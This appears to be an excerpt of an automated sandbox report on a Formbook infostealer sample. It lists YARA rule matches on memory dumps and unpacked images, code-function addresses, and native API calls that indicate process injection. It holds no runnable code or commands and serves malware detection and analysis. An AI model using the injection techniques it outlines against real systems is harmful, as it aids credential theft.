          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_0006A2A9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_003458F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_003458E6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 4_2_0006A035
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0006A2A9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00401030
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041C0BF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041C94E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041B9B4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041D22F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041C345
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041D359
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00408C6B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00408C70
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0041C559
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ABE0C6
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AED005
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B3D06D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC3040
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AD905A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ABE2E9
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B61238
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B663BF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ABF3CF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AE63DB
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC2305
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B0A37B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC7353
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AD1489
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AF5485
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B4443E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AFD47D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B405E3
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ADC5F0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC351F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B06540
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC4680
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ACE6C1
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B0A634
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B62622
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ACC7BC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B4579A
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AF57C3
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B5F8EE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B3F8C4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AE286D
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ACC85C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC29B2
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B6098E
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AD69FE
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B45955
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B4394B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B73A83
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B6CBA4
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B4DBDA
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ABFBD7
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AE7B00
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B5FDDD
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AF0D3B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ACCD5B
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AF2E2F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00ADEE4C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B5CFB1
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00B32FDC
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AD0F3F
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AEDF7C
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00146F06
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_001408FB
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00140902
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_001432FF
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00143302
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00141359
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00141362
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00147D02
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_001457B2
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_0006A035
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020C1238
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201E2E9
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02022305
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02027353
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0206A37B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020C63BF
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201F3CF
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020463DB
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0204D005
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02023040
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0203905A
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0209D06D
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201E0C6
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020C2622
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0206A634
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02024680
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0202E6C1
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020A579A
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0202C7BC
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020557C3
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020A443E
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0205D47D
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02055485
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02031489
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0202351F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02066540
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020A05E3
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0203C5F0
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020D3A83
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02047B00
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020CCBA4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020ADBDA
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0201FBD7
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0202C85C
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0204286D
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0209F8C4
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020BF8EE
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020A394B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020A5955
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020C098E
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020229B2
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020369FE
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02052E2F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0203EE4C
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02030F3F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0204DF7C
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020BCFB1
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02092FDC
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_02050D3B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0202CD5B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020BFDDD
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AD22F
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_000AC94E
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_00098C6B
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_00098C70
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_00092D90
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_00092FB0
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00ABE2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00B2F970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00B03F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00ABDF5C appears 121 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: String function: 00B0373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0208F970 appears 84 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0201DF5C appears 121 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0206373B appears 245 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 02063F92 appears 132 times
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: String function: 0201E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004185D0 NtCreateFile
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00418680 NtReadFile
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00418700 NtClose
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004187B0 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004185CA NtCreateFile
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004186FA NtClose
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004187AA NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB00C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0078 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0048 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB07AC NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF9F0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF900 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFBB8 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC90 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC60 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFD8C NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFEA0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFFB4 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB10D0 NtOpenProcessToken
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0060 NtQuerySection
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB01D4 NtSetValueKey
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB010C NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB1148 NtOpenThread
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF8CC NtWaitForSingleObject
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAF938 NtWriteFile
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB1930 NtSetContextThread
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFAB8 NtQueryValueKey
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFA20 NtQueryInformationFile
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFA50 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFBE8 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFB50 NtCreateKey
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC30 NtOpenProcess
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFC48 NtSetInformationFile
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB0C40 NtGetContextThread
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AB1D80 NtSuspendThread
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFD5C NtEnumerateKey
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFE24 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFFFC NtCreateProcessEx
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AAFF34 NtQueueApcThread
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00146F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00146F12 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020100C4 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020107AC NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FB50 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk
